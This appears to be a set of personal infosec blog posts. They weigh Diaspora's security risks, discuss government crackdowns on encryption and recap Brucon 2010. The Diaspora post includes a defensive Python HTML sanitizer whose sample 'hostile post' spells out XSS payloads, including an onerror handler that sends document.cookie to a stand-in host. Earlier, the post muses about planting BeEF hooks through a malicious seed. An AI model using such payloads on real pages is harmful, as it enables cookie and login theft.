Diaspora — a FAILtale perspective

I was talking with some friends this morning about Diaspora, the social networking project that’s gotten some attention in the press lately. We were kicking around a couple of its pros and cons, and I promised that I would write a quick brief about it – one that I started a few hours ago and, after some thought, have re-crafted into a blog post… Without further ado, here is my (preliminary!) perspective on the project:

From a purely conceptual point of view: 

Diaspora is a platform that allows you to share your social content in a place under your control. Like Facebook, Flickr, and other socnets, you have a “central place” for seeing what your friends are up to, sharing photos and what not; unlike other socnets, that central place isn’t run by someone else.

From a semi-technical point of view: 

the point of a social network is to share information. The easiest way to do that is to have all that information sitting in one place, in one single format, in one single repository. The concept that Diaspora brings to the table is not necessarily new: don’t centralize the content but rather the feed to the content. If you look at it that way, Diaspora is little more than a fancy CMS — but then again, so are social networks in general. The interesting thing is, Diaspora has the “social network” branding that’s made it (and its more traditional peers) that much more popular.

From a technical point of view: 

though the concept is not novel, the need is clearly there. Moxie Marlinspike gave a talk at Defcon this year which pretty much summed up the problem: the price of the comforts and practicality of today’s technology is privacy — Diaspora, like Marlinspike’s own project, GoogleSharing, intends to spare us this costly sacrifice. Such endeavors would hopefully make secure sharing of information more accessible to non-technical socnet-savvy folks who care about their privacy — and this may be more people than we think. From what I’ve come to understand, Diaspora’s proposal is an application of the peer-to-peer model to social networks. This does have several benefits beyond those highlighted above — for instance, Diaspora’s “infrastructure” would grow organically as it gains momentum, since most (if not all) of the content is hosted on users’ equipment.

From an infosec point of view: 

I would definitely love to move to a model that allows me to better control my private information — but I’d be careful to make sure that I’m not jumping out of the frying pan into the fire. Here are a few things to consider:

  • Most people don’t really know the first thing about setting up a server environment which, judging by the FAQ, is a necessity. Unless you’re an IT puke, that means you’ll either be configuring your machine badly or not configuring it at all. Diaspora might propose a hosting service à la WordPress in the future, which to me kind of sounds like it defeats the purpose.
  • Owning your own decentralized seed is kind of like having a puppy: it doesn’t just take care of itself. It’s hard enough to get regular users to update their antivirus, let alone patch and maintain a server…
  • The biggest advantage of Diaspora is that, since your content is under your control, you can yank it off the ‘net whenever you damn well please. However, this sort of assumes that all seeds that connect to yours are benign, doesn’t it? Anything you’ve already shared with a friend’s seed is sitting on their hardware, and deleting it on yours doesn’t pull it back. What if one of your friends’ seeds has been compromised?
  • Decentralization of the infrastructure means that it is both harder to keep the environment consistent and practically impossible to perform adequate monitoring. If Diaspora issues a security patch, how will they ensure that it gets applied within a reasonably short period of time? How can Diaspora proactively track and repel attacks if they’re unable to analyze data? It seems likely that this sort of support is not in the roadmap.
  • The environment is under user control – so what if you were to write a malicious seed in Python (or even in Ruby, the language Diaspora itself is written in, on Rails) that collected data from people who have friended you? How sweet would it be to drop a BeEF hook in your page, log a few passwords, portscan people’s networks, or maybe even heap spray your “friends”? And who’s going to catch you at work?
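The last two bullets (a compromised friend’s seed and a deliberately malicious one) come down to the same thing: whatever your seed pulls from another seed is attacker-controlled input, and rendering it as-is is exactly how a BeEF hook or a cookie-stealing event handler ends up in your page. What follows is an added example, not Diaspora’s own code and not part of its protocol: a small allow-list HTML sanitizer built on the Python standard library only, run over a constructed “post” of the kind a hostile seed might return. The tag and attribute allow-lists, the hook.example / friend.example hostnames and the sample post are all assumptions made for this illustration.

```python
"""Added example: never render another seed's content as raw HTML.

Allow-list sanitizer built only on the standard library. The tag/attribute
allow-lists and the sample post are assumptions made for this example; this
is not Diaspora's own code or protocol.
"""
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "a", "ul", "ol", "li",
                "blockquote", "code"}
ALLOWED_ATTRS = {"a": {"href"}}       # every other attribute (on*, style, ...) is dropped
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}
SAFE_SCHEMES = {"http", "https", "mailto"}
VOID_TAGS = {"br"}


def safe_href(value):
    """True for relative links and http/https/mailto; False for javascript:, data:, ..."""
    # Browsers ignore ASCII whitespace/control characters inside a URL, so strip
    # them first or "java\nscript:" would look like it has no scheme at all.
    cleaned = "".join(ch for ch in value if ord(ch) > 0x20)
    scheme = urlsplit(cleaned).scheme.lower()
    return scheme == "" or scheme in SAFE_SCHEMES


class SeedHtmlSanitizer(HTMLParser):
    """Rebuilds the fragment from allowed tags only; all text is re-escaped."""

    def __init__(self):
        super().__init__(convert_charrefs=True)   # entities are decoded before we see them
        self._out = []
        self._open = []     # allowed tags currently open, to close them in order
        self._skip = 0      # > 0 while inside a DROP_WITH_CONTENT element

    def handle_starttag(self, tag, attrs):
        if self._skip:
            self._skip += tag in DROP_WITH_CONTENT
            return
        if tag in DROP_WITH_CONTENT:
            self._skip = 1  # drop the element and its body (hook.js, iframes, ...)
            return
        if tag not in ALLOWED_TAGS:
            return          # unknown tag (img, form, ...): drop the tag, keep its text
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, ()):
                continue    # this is what removes onclick, onerror, style, srcdoc, ...
            value = value or ""
            if name == "href" and not safe_href(value):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self._out.append(f"<{tag}{''.join(kept)}>")
        if tag not in VOID_TAGS:
            self._open.append(tag)

    def handle_endtag(self, tag):
        if self._skip:
            self._skip -= tag in DROP_WITH_CONTENT
            return
        if tag in self._open:   # close children left open so the output stays well-formed
            while True:
                closed = self._open.pop()
                self._out.append(f"</{closed}>")
                if closed == tag:
                    break

    def handle_data(self, data):
        if not self._skip:
            self._out.append(escape(data, quote=False))

    # comments, <!DOCTYPE ...> and <?...?> hit the no-op defaults and simply vanish

    def result(self):
        while self._open:       # close anything the input left open
            self._out.append(f"</{self._open.pop()}>")
        return "".join(self._out)


def sanitize(fragment):
    parser = SeedHtmlSanitizer()
    parser.feed(fragment)
    parser.close()              # flush any buffered text
    return parser.result()


# Constructed sample of a "post" a hostile or compromised seed could return;
# not captured from any real seed.
HOSTILE_POST = (
    "<p>Check out my <b>holiday</b> pics!</p>"
    '<script src="http://hook.example/hook.js"></script>'
    "<img src=\"x\" onerror=\"fetch('http://hook.example/?c='+document.cookie)\">"
    '<a href="javascript:alert(document.cookie)">album</a>'
    '<a href="&#106;avascript:alert(1)">album 2</a>'
    '<a href="https://friend.example/photos" onclick="steal()">album 3</a>'
    '<iframe src="http://hook.example/"></iframe>'
    '<p onmouseover="steal()">See you soon &lt;3</p>'
)

if __name__ == "__main__":
    print(sanitize(HOSTILE_POST))
```

Two design points are worth noting. The sanitizer drops every attribute it does not explicitly allow, so it never has to enumerate the on* handlers, and it checks the URL scheme only after the parser has decoded entities and after ASCII whitespace has been stripped, which is why both the &#106;avascript: link and a java\nscript: link are caught. Nothing here replaces a Content-Security-Policy header on the seed; that is the natural second layer for anything a parser like this mishandles.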

That pretty much sums it up for me. All things said, I think it’s a wonderful idea, and sincerely hope that the work bears fruit. I’ll be looking into the source code and trying to contribute as soon as I get my ass in gear!!!

A few links related to the project:

Of governments and their escalating reaction to encryption

Stop me if you’ve heard this one:

what happens when governments start cracking down on encryption after a twenty-year hiatus?

Bad shit, if you ask me.

You might have heard about the teenager that got jailed in the UK for not disclosing his password. The way I see it, this goes along the same lines as the UAE banning BlackBerrys on account of not being able to snoop on people: governments are reacting to encryption in a more concrete manner than ever before. This is not to say that governments haven’t been allergic to the commercialization of encryption before — I remember reading an article in college about the shit Whit Diffie had to go through to develop public key cryptography, not to mention the countless bans and export restrictions. However, it seems to me that governments are switching tactics, moving from the legislative to the pragmatic at a dramatic pace. What has triggered this sudden (renewed) interest in encryption?

For some reason, I’m wondering if it’s not the whole Google vs. China debacle that’s stoked the fires of cyberwar — because let’s face it, crypto has always had a strong role in warfare. After all, cryptography is easily as old as its etymological language — ancient Greek — possibly older.

Here’s my reasoning: the media hype about China spying on its dissidents reflects in a very public manner just how far it’s willing to go — this triggers the following reaction:
Increase in public awareness
  => increase in fear
           => increase in security
                    = opportunity for governments to finally do that shit they’ve been meaning to do.

Well, that’s all the conspiracy theorist in me has to say about that. Guess this whole “encryption” thing will blow over — but then again, what if it doesn’t? Does the actual application of laws imposed by the likes of the Patriot Act and RIPA not, in some way, confirm that we’re living in an Orwellian world?

Brucon 2010: a recap

I was at Brucon 2010 last week, and it was a blast!

The ambiance at the con was very much reminiscent of Defcon’s: people talking passionately about security in a relaxed, geek-and-caffeine-rich environment.

In the past, when attending infosec cons, I tended to go to all the talks — this time, I decided to go to as many workshops as possible. I must say, I was not disappointed at all — while talks are often absolutely fascinating and wildly entertaining, workshops provide a chance to understand something at a much deeper level and allow you to test your knowledge of the topic; they also allow the speaker to tune her content to the audience in a much more interactive manner, providing more, or less, background information according to the crowd’s grasp of the subject. For instance, during the malicious PDF analysis workshop, Didier Stevens provided an overview of the PDF structure and started working through his samples, but quickly started skipping through examples he thought were obvious and allotting more time to the ‘juicy bits’.

The best part of a workshop, I’ve found, is that it provides you with an environment in which it’s OK to try something new — and it’s alright to mess up. I walked out of the hardware hacking village with a profound sense of accomplishment, having learned how to solder with Mitch Altman and how to program Arduinos with Fish. I’ve always been a fan of all things electronic, but up to the day I actually learned how to solder, my grasp of what was truly involved was somewhat fuzzy — you look at things very differently once you know what goes into making them.

I’m not going to cover the talks in detail; Peter did a fantastic job of that, so here’s his post. You should definitely read about the following talks:

  • Mikko Hypponen’s recounting of the last 25 years of malware — which was just amazing
  • Joe McCray’s “You spent all that money and you still got 0wned” presentation; better yet, wait until the video’s out — the guy’s hilarious
  • Stephan Chenette’s presentation of Fireshark was really good, because he not only went over what his tool does but also covered the concept behind what he calls “malicious ecosystems”
  • Dale Pearson’s head hacking presentation gave me a fresh perspective on just how far social engineering could go — spooky, really. Check out his site, it’s extremely cool!